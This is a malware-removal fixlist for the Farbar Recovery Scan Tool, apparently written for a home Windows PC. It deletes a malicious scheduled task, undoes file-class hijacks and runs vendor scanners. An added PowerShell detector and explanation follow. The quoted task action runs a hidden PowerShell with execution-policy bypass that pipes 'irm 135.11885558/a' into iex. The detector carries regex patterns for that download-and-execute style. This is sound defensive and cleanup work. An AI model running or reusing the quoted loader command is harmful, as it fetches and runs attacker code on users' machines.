Start
CreateRestorePoint:
CloseProcesses:
Task: {69B9514A-88DE-49A0-91FE-440F6F03CF67} - System32\Tasks\App Explorer => C:\Users\rudhr\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe [9793520 2025-06-30] (SweetLabs Inc -> SweetLabs, Inc) <==== ATTENTION
C:\Users\rudhr\AppData\Local\Host App Service
Task: {0F6AA10E-D3B4-4E26-9684-1F3FB88047A9} - System32\Tasks\InteractiveServices\MicrosoftCertificateServicesPKIClientCmdletsResourcesTask.CL-NCLS-1-5-21-1832201896-1578702492-506240896-1001 => C:\Windows\System32\conhost.exe [1011712 2026-05-13] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell -NoProfile -ExecutionPolicy Bypass -Command "irm 135.11885558/a | iex" <==== ATTENTION
2026-06-10 07:22 - 2026-06-10 07:47 - 000000000 ____D C:\WINDOWS\system32\Tasks\InteractiveServices
2026-06-10 07:24 - 2026-06-10 07:24 - 000000000 ____D C:\Users\rudhr\AppData\Local\rhdur
2026-06-10 07:23 - 2026-06-10 07:23 - 000000000 ____D C:\Users\rudhr\AppData\Local\Yandex
2026-06-10 07:19 - 2025-10-09 23:31 - 000000000 ____D C:\Users\rudhr\AppData\Roaming\RenPy
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
FirewallRules: [UDP Query User{EE4E3FF0-B13A-4ECB-B717-C1BC2076EE5D}C:\games\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot roulette.exe] => (Allow) C:\games\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot roulette.exe => No File
FirewallRules: [TCP Query User{CC5787EB-8856-41E4-A8D0-067CA99D1E95}C:\games\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot roulette.exe] => (Allow) C:\games\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot roulette.exe => No File
FirewallRules: [{035F4BFC-F945-44AF-8FD8-E20E935797D1}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{B0DBD9A5-89AB-432C-AE14-9E076904DAC7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [TCP Query User{B5F15CA8-464A-4F5D-A9DD-CFC5C162D48F}C:\users\rudhr\downloads\scrcpy-win64-v3.3.1\scrcpy-win64-v3.3.1\adb.exe] => (Allow) C:\users\rudhr\downloads\scrcpy-win64-v3.3.1\scrcpy-win64-v3.3.1\adb.exe => No File
FirewallRules: [UDP Query User{F0C1D244-3899-4C64-8825-465EDA3CFEAC}C:\users\rudhr\downloads\scrcpy-win64-v3.3.1\scrcpy-win64-v3.3.1\adb.exe] => (Allow) C:\users\rudhr\downloads\scrcpy-win64-v3.3.1\scrcpy-win64-v3.3.1\adb.exe => No File
FirewallRules: [TCP Query User{1AEEFEFF-95E8-45A2-987B-693526C66D54}C:\games\lies of p\liesofp\binaries\win64\lop-win64-shipping.exe] => (Allow) C:\games\lies of p\liesofp\binaries\win64\lop-win64-shipping.exe => No File
FirewallRules: [UDP Query User{BF3171FB-2772-4429-8798-F96F6238EA56}C:\games\lies of p\liesofp\binaries\win64\lop-win64-shipping.exe] => (Allow) C:\games\lies of p\liesofp\binaries\win64\lop-win64-shipping.exe => No File
FirewallRules: [{C3F6BD26-4914-4181-81D1-137F36A17A28}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [{8E454167-9A00-4CAE-903F-64E9EA2BDEEB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [TCP Query User{C5D22348-A750-49EC-86D6-D0AB97B5384F}C:\games\wagotabi\game\wagotabi.exe] => (Allow) C:\games\wagotabi\game\wagotabi.exe => No File
FirewallRules: [UDP Query User{FC3086F6-8EBA-42B3-92C6-59D70201E3D1}C:\games\wagotabi\game\wagotabi.exe] => (Allow) C:\games\wagotabi\game\wagotabi.exe => No File
FirewallRules: [TCP Query User{9C3B2C77-D3ED-4FB9-804A-FDE23BC88645}C:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe] => (Allow) C:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe => No File
FirewallRules: [UDP Query User{5EBB0F6C-83C3-4BBD-AA41-05CB5BE59707}C:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe] => (Allow) C:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe => No File
FirewallRules: [TCP Query User{CB5EBB3F-5BC1-4A1E-9FCB-0EE15FA7B83A}C:\games\sekiro shadows die twice\sekiro.exe] => (Allow) C:\games\sekiro shadows die twice\sekiro.exe => No File
FirewallRules: [UDP Query User{8007493F-8EC6-4E0B-A0F9-A700EF12B787}C:\games\sekiro shadows die twice\sekiro.exe] => (Allow) C:\games\sekiro shadows die twice\sekiro.exe => No File
FirewallRules: [{0A62178C-35F4-4ECE-9DD7-898A35D069F7}] => (Allow) C:\WINDOWS\System32\DriverStore\FileRepository\predatorservice.inf_amd64_ec38587b71ef8108\OpenRGB.exe => No File
FirewallRules: [{9F08854A-0A99-41D0-9142-24E44BAA4923}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DOOMEternal\launcher\idTechLauncher.exe => No File
FirewallRules: [{3AE7A2C5-56DB-4FB5-B553-F42AB192226E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DOOMEternal\launcher\idTechLauncher.exe => No File
FirewallRules: [TCP Query User{F48329CB-F624-41D0-9CB6-C16252721EB7}C:\program files\windowsapps\43692cyanfood.airserver-screenmirroringandfileshar_1.0.8.0_x64__68m3xzxrwb0hp\runtime\bin\java.exe] => (Allow) C:\program files\windowsapps\43692cyanfood.airserver-screenmirroringandfileshar_1.0.8.0_x64__68m3xzxrwb0hp\runtime\bin\java.exe => No File
FirewallRules: [UDP Query User{852C7ED0-5C7B-4AF4-A3A7-A684A6F7D1F6}C:\program files\windowsapps\43692cyanfood.airserver-screenmirroringandfileshar_1.0.8.0_x64__68m3xzxrwb0hp\runtime\bin\java.exe] => (Allow) C:\program files\windowsapps\43692cyanfood.airserver-screenmirroringandfileshar_1.0.8.0_x64__68m3xzxrwb0hp\runtime\bin\java.exe => No File
FirewallRules: [TCP Query User{2C07CE86-EE02-4C2E-8B87-02D370712E91}C:\games\ultrakill\ultrakill.exe] => (Allow) C:\games\ultrakill\ultrakill.exe => No File
FirewallRules: [UDP Query User{7B4D5E2B-99EB-4B95-8F22-754C5BE2794F}C:\games\ultrakill\ultrakill.exe] => (Allow) C:\games\ultrakill\ultrakill.exe => No File
FirewallRules: [TCP Query User{99473623-FE0F-457A-BCEA-86B50596C833}C:\program files (x86)\steam\steamapps\common\skate\skate.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\skate\skate.exe => No File
FirewallRules: [UDP Query User{91A3C617-FB0D-4723-AE40-BC224877C4C6}C:\program files (x86)\steam\steamapps\common\skate\skate.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\skate\skate.exe => No File
FirewallRules: [TCP Query User{90241BEB-AB45-41A3-B749-8F704C57DE12}C:\games\trepang2\cppfps\binaries\win64\cppfps-win64-shipping.exe] => (Allow) C:\games\trepang2\cppfps\binaries\win64\cppfps-win64-shipping.exe => No File
FirewallRules: [UDP Query User{BF255CA4-0E67-476E-BAEE-B9D18E6BFCD1}C:\games\trepang2\cppfps\binaries\win64\cppfps-win64-shipping.exe] => (Allow) C:\games\trepang2\cppfps\binaries\win64\cppfps-win64-shipping.exe => No File
FirewallRules: [TCP Query User{01817DF2-BC9B-4B5D-9A03-8FCDE166E4E0}C:\games\yakuza 0\media\yakuza0.exe] => (Allow) C:\games\yakuza 0\media\yakuza0.exe => No File
FirewallRules: [UDP Query User{38A6F331-1696-43C9-997E-4A17750C6086}C:\games\yakuza 0\media\yakuza0.exe] => (Allow) C:\games\yakuza 0\media\yakuza0.exe => No File
FirewallRules: [TCP Query User{28E08063-AD3E-4F0E-84C4-61556507FE90}C:\games\black.souls\black.souls\game\game.exe] => (Allow) C:\games\black.souls\black.souls\game\game.exe => No File
FirewallRules: [UDP Query User{5C8D2389-4578-45C8-B74D-CFC6F22F4993}C:\games\black.souls\black.souls\game\game.exe] => (Allow) C:\games\black.souls\black.souls\game\game.exe => No File
FirewallRules: [TCP Query User{493AF6D0-5975-47DB-8003-319854634FF8}C:\users\rudhr\appdata\local\medal\app-4.3087.0\medal.exe] => (Allow) C:\users\rudhr\appdata\local\medal\app-4.3087.0\medal.exe => No File
FirewallRules: [UDP Query User{00EC93FD-CB38-4B01-AE8E-B0E53A40ABF9}C:\users\rudhr\appdata\local\medal\app-4.3087.0\medal.exe] => (Allow) C:\users\rudhr\appdata\local\medal\app-4.3087.0\medal.exe => No File
FirewallRules: [TCP Query User{D8E8D088-A3FF-4698-B36E-9B18AB438B23}C:\games\nier replicant ver.1.22474487139\nier replicant ver.1.22474487139.exe] => (Allow) C:\games\nier replicant ver.1.22474487139\nier replicant ver.1.22474487139.exe => No File
FirewallRules: [UDP Query User{4F6D5D54-2379-4320-82D2-3B39E80B8DC0}C:\games\nier replicant ver.1.22474487139\nier replicant ver.1.22474487139.exe] => (Allow) C:\games\nier replicant ver.1.22474487139\nier replicant ver.1.22474487139.exe => No File
FirewallRules: [TCP Query User{628777FD-0C23-4E70-8107-3CBAC240DD7A}C:\users\rudhr\downloads\pcfa emulator\pcfa\emulator\rpcs3.exe] => (Allow) C:\users\rudhr\downloads\pcfa emulator\pcfa\emulator\rpcs3.exe => No File
FirewallRules: [UDP Query User{6AAEA890-F15A-4382-B855-6D3C87D999EB}C:\users\rudhr\downloads\pcfa emulator\pcfa\emulator\rpcs3.exe] => (Allow) C:\users\rudhr\downloads\pcfa emulator\pcfa\emulator\rpcs3.exe => No File
FirewallRules: [TCP Query User{C3349E69-5651-4F5F-A666-5AB5E585CA16}C:\games\spaceengine\system\spaceengine.exe] => (Allow) C:\games\spaceengine\system\spaceengine.exe => No File
FirewallRules: [UDP Query User{30803813-ADFB-449B-89EA-4D10231BAACA}C:\games\spaceengine\system\spaceengine.exe] => (Allow) C:\games\spaceengine\system\spaceengine.exe => No File
FirewallRules: [TCP Query User{B7C8F992-B78B-41D5-BDB8-ABC6AB178ADD}C:\games\spaceengine\system\launchpad.exe] => (Allow) C:\games\spaceengine\system\launchpad.exe => No File
FirewallRules: [UDP Query User{CECFC800-BA07-404F-87F6-45DEC6538650}C:\games\spaceengine\system\launchpad.exe] => (Allow) C:\games\spaceengine\system\launchpad.exe => No File
FirewallRules: [TCP Query User{1822FB96-D3CE-444A-AA3E-19685EA5D72D}C:\games\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\games\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [UDP Query User{84B9C961-503E-4B7C-A979-09CEAC57B065}C:\games\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\games\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [TCP Query User{92EDCCAC-2A21-4754-A98F-6CCCFF33E4A4}C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [UDP Query User{F01D7782-A902-4753-895B-9CBB3CEBFD46}C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [TCP Query User{CDECA845-D05B-442D-97FA-E028126FDCBF}C:\program files (x86)\steam\steamapps\common\wallpaper_engine\bin\ui32.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\wallpaper_engine\bin\ui32.exe => No File
FirewallRules: [UDP Query User{A72734D4-A805-4855-9160-A427AF0A3206}C:\program files (x86)\steam\steamapps\common\wallpaper_engine\bin\ui32.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\wallpaper_engine\bin\ui32.exe => No File
FirewallRules: [TCP Query User{53516243-FB74-4D36-B423-2DA062040340}C:\users\rudhr\downloads\rush proto v0.1.1\rush\rush.exe] => (Allow) C:\users\rudhr\downloads\rush proto v0.1.1\rush\rush.exe => No File
FirewallRules: [UDP Query User{568ED5F0-3216-4954-9719-123264707889}C:\users\rudhr\downloads\rush proto v0.1.1\rush\rush.exe] => (Allow) C:\users\rudhr\downloads\rush proto v0.1.1\rush\rush.exe => No File
FirewallRules: [{C4B7654E-1657-49E9-95AC-C5DBAD0078A0}] => (Allow) C:\Program Files\Razer\RazerAppEngine\app-4.0.662\RazerAppEngine.exe => No File
Task: {077BA067-7C15-40F0-B22E-C9DC2A54B4A2} - System32\Tasks\Microsoft\Windows\Location\Notifications => %windir%\System32\LocationNotificationWindows.exe (No File)
Task: {0BB36A32-0D9E-4297-AFD7-6BD7B5DB4C9B} - System32\Tasks\Microsoft\Windows\UNP\RunUpdateNotificationMgr => %windir%\System32\UNP\UpdateNotificationMgr.exe (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
S3 EAAntiCheat; system32\drivers\eaanticheat.sys (No File)
S4 NvModuleTracker; \SystemRoot\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_ea6cec41fc5b2a8b\NvModuleTracker.sys (No File)
S3 PredatorService; \SystemRoot\System32\DriverStore\FileRepository\predatorservice.inf_amd64_ec38587b71ef8108\PredatorServiceSoftwareComponent.sys (No File)
2025-11-22 14:33 - 2025-11-22 14:33 - 000000048 ____R () C:\Users\rudhr\AppData\Local\C1CC5A19E18DB62B3DDA089551FC3FBB
HKU\S-1-5-21-1832201896-1578702492-506240896-1001\Software\Classes\regfile: <==== ATTENTION
HKU\S-1-5-21-1832201896-1578702492-506240896-1001\Software\Classes\.reg: => <==== ATTENTION
HKU\S-1-5-21-1832201896-1578702492-506240896-1001\Software\Classes\.bat: => <==== ATTENTION
HKU\S-1-5-21-1832201896-1578702492-506240896-1001\Software\Classes\.cmd: => <==== ATTENTION
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
File: C:\Program Files\Npcap\CheckStatus.bat
CMD: type "C:\Program Files\Npcap\CheckStatus.bat"
Folder: C:\Users\rudhr\Downloads\Elin.7z_Archive_free_3799
Folder: C:\Users\rudhr\AppData\Local\Creative
Powershell: Get-ScheduledTask | select -first 30 | Get-ScheduledTaskInfo
Powershell: @("$env:APPDATA","$env:LOCALAPPDATA") | ForEach-Object { Get-ChildItem $_ -Recurse -Filter "index.js" -ErrorAction SilentlyContinue } | Where-Object { $_.FullName -match "discord_desktop_core" } | ForEach-Object { Write-Host "--- $($_.FullName) ---"; (Get-Content $_.FullName -Raw).Substring(0,[Math]::Min(2000,(Get-Content $_.FullName -Raw).Length)) }
Powershell: (Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -ErrorAction SilentlyContinue).PSObject.Properties | Where-Object { $_.Name -match "^[a-z]$" } | ForEach-Object { Write-Host "$($_.Name): $($_.Value)" }
C:\WINDOWS\Temp\*
C:\WINDOWS\SystemTemp\*
C:\Users\rudhr\AppData\Local\Temp\*
StartPowerShell:
# Downloads the newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log to the console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects, add an argument /preinstalled to the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:
StartPowershell:
# Replace /scanonly with /clean if you also want to delete items -- however, this will activate a trial license on the system, I do not recommend it
$hmpExe = "$env:TEMP\HitmanPro_x64.exe"
$logFile = "$env:TEMP\HitmanPro_ScanLog.txt"
Invoke-WebRequest -Uri "https://dl.surfright.nl/HitmanPro_x64.exe" -OutFile $hmpExe -UseBasicParsing
$proc = Start-Process $hmpExe -ArgumentList "/ews","/scanonly","/noinstall","/log=`"$logFile`"","/logtype=txt" -Wait -PassThru
if (!(Test-Path $logFile)) { Write-Host "Scan failed (exit $($proc.ExitCode))"; exit 1 }
Get-Content $logFile -Encoding Unicode
EndPowershell:
StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from Emsisoft's official site, updates it and scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUPs in 1) system memory and 2) important folders, as the documentation says
# It will scan in compressed archives, in mail archives, in NTFS alternate data streams and use cloud requests
# ---
# You can use the argument "/delete" to delete found objects including references, but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan, but that may take longer than what FRST can handle.
# You can use the argument /quarantine="[folder]" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) {
New-Item -Path $frstPath -ItemType Directory -Force | Out-Null
}
if (-not (Test-Path $extractPath)) {
New-Item -Path $extractPath -ItemType Directory -Force | Out-Null
}
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
# Wait for the self-extractor to drop a2cmd.exe, but stop waiting after 10 minutes so a failed download or extraction cannot hang the fix
$deadline = (Get-Date).AddMinutes(10)
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe") -and (Get-Date) -lt $deadline) { Start-Sleep -Milliseconds 1000 }
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if (-not (Test-Path "$extractPath\bin64\a2cmd.exe")) { Write-Host "EEK extraction failed, a2cmd.exe not found under $extractPath"; exit 1 }
if ([Environment]::Is64BitOperatingSystem) {
$a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
$a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:
cmd: del %temp%\*.* /f /s /q
cmd: rd /s /q %temp%
cmd: bitsadmin /reset /allusers
cmd: netsh winsock reset catalog
cmd: ipconfig /flushdns
RemoveProxy:
EmptyTemp:
End
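The InteractiveServices task tagged ATTENTION above is the actual loader in this fixlist: the action starts `conhost.exe --headless`, which launches its child with no visible console window, and that child is a PowerShell with `-ExecutionPolicy Bypass` that fetches and runs a second stage with `irm ... | iex`. The host is written as `135.11885558`, a two-part IPv4 literal that the legacy inet_aton rules (and .NET's `IPAddress.Parse`) still accept, so a plain search for dotted-quad addresses misses it. The following PowerShell is an added example, not part of the fixlist and not the fixlist author's code; it must not be pasted into fixlist.txt. It reproduces two of the checks behind the ATTENTION lines: it walks the registered scheduled tasks and flags actions that match the hidden download-and-execute pattern, normalizing shorthand IP literals, and it lists per-user overrides of the `regfile`, `.reg`, `.bat` and `.cmd` classes next to the machine-wide handlers in HKLM. The function names are the example's own; the only sample input is the task command line copied from the log line above, labelled as such in the code.

```powershell
# Added example, not part of the fixlist above. Run it in an elevated PowerShell, never inside fixlist.txt.
# 1. Scheduled tasks whose action starts a hidden download-and-execute PowerShell (the InteractiveServices task)
# 2. Per-user file class overrides (.bat/.cmd/.reg/regfile) that shadow the HKLM handlers

# Rewrites a shorthand IPv4 literal such as 135.11885558 into dotted-quad form.
# .NET keeps the legacy inet_aton rules, so 1-, 2- and 3-part literals parse; anything else returns $null.
function ConvertTo-DottedQuad {
    param([Parameter(Mandatory)][string]$Literal)
    try {
        $ip = [System.Net.IPAddress]::Parse($Literal)
        if ($ip.AddressFamily -eq [System.Net.Sockets.AddressFamily]::InterNetwork) { return $ip.IPAddressToString }
    } catch { }
    return $null
}

# Scores one task action (Execute + Arguments). Returns $null when no indicator matches.
function Test-TaskAction {
    param([string]$Execute, [string]$Arguments)
    $cmd = "$Execute $Arguments"
    $indicators = New-Object System.Collections.Generic.List[string]
    if ($cmd -match '(?i)conhost(\.exe)?\s+--headless')  { $indicators.Add('conhost --headless (child gets no console window)') }
    if ($cmd -match '(?i)-ExecutionPolicy\s+Bypass')       { $indicators.Add('-ExecutionPolicy Bypass') }
    if ($cmd -match '(?i)\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString)\b[^|]*\|\s*(iex|Invoke-Expression)\b') {
        $indicators.Add('download piped into iex')
    }
    if ($cmd -match '(?i)\s-(enc|encodedcommand|e)\s')    { $indicators.Add('encoded command') }
    if ($indicators.Count -eq 0) { return $null }

    # Bare numeric hosts, including the 1- to 3-part shorthand forms a dotted-quad regex would miss
    $hosts = [regex]::Matches($cmd, '(?<![\w.])(\d{1,3}(?:\.\d{1,10}){1,3})(?=[/:\s"''|]|$)') |
        ForEach-Object { $_.Groups[1].Value } |
        ForEach-Object { [pscustomobject]@{ Literal = $_; Normalized = ConvertTo-DottedQuad $_ } }

    [pscustomobject]@{ Indicators = $indicators.ToArray(); Hosts = @($hosts); CommandLine = $cmd }
}

# Walks every registered task and reports the actions that trip Test-TaskAction.
function Find-SuspiciousTasks {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in @($task.Actions)) {
            if (-not $action.Execute) { continue }   # COM handler / e-mail actions carry no Execute
            $hit = Test-TaskAction -Execute $action.Execute -Arguments $action.Arguments
            if ($hit) {
                [pscustomobject]@{
                    Task       = $task.TaskPath + $task.TaskName
                    Indicators = $hit.Indicators -join '; '
                    Hosts      = ($hit.Hosts | ForEach-Object { "$($_.Literal) -> $($_.Normalized)" }) -join ', '
                    Command    = $hit.CommandLine
                }
            }
        }
    }
}

# For each class name, shows whether the user hive shadows it and what each hive hands to the shell.
# A per-user key for these classes is unusual on a home system and is how .bat/.cmd/.reg execution gets redirected.
function Get-UserClassOverride {
    param([string[]]$ClassName = @('regfile', '.reg', '.bat', '.cmd'))
    foreach ($name in $ClassName) {
        $userKey    = Get-Item -Path "HKCU:\Software\Classes\$name" -ErrorAction SilentlyContinue
        $userCmd    = Get-Item -Path "HKCU:\Software\Classes\$name\shell\open\command" -ErrorAction SilentlyContinue
        $machineKey = Get-Item -Path "HKLM:\Software\Classes\$name" -ErrorAction SilentlyContinue
        $userDefault    = $null; if ($userKey)    { $userDefault    = $userKey.GetValue('') }
        $userOpen       = $null; if ($userCmd)    { $userOpen       = $userCmd.GetValue('') }
        $machineDefault = $null; if ($machineKey) { $machineDefault = $machineKey.GetValue('') }
        [pscustomobject]@{
            Class           = $name
            UserOverride    = [bool]$userKey
            UserDefault     = $userDefault
            UserOpenCommand = $userOpen
            MachineDefault  = $machineDefault
        }
    }
}

# Constructed sample: the task action exactly as the FRST log line above reports it, so the scoring
# can be exercised without the task being present on this machine.
$sample = Test-TaskAction -Execute 'C:\Windows\System32\conhost.exe' `
    -Arguments '--headless powershell -NoProfile -ExecutionPolicy Bypass -Command "irm 135.11885558/a | iex"'
$sample | Format-List

# Live checks against the system the script runs on
Find-SuspiciousTasks  | Format-Table -AutoSize -Wrap
Get-UserClassOverride | Format-Table -AutoSize
```

The scoring deliberately keys on the launch pattern (console-less proxy, policy bypass, remote content piped into `iex`) rather than on the task name, because the name here was chosen to look like a Microsoft PKI client task and will differ on the next machine. Feed the normalized host into your firewall or DNS block list instead of the literal as it appears in the command line.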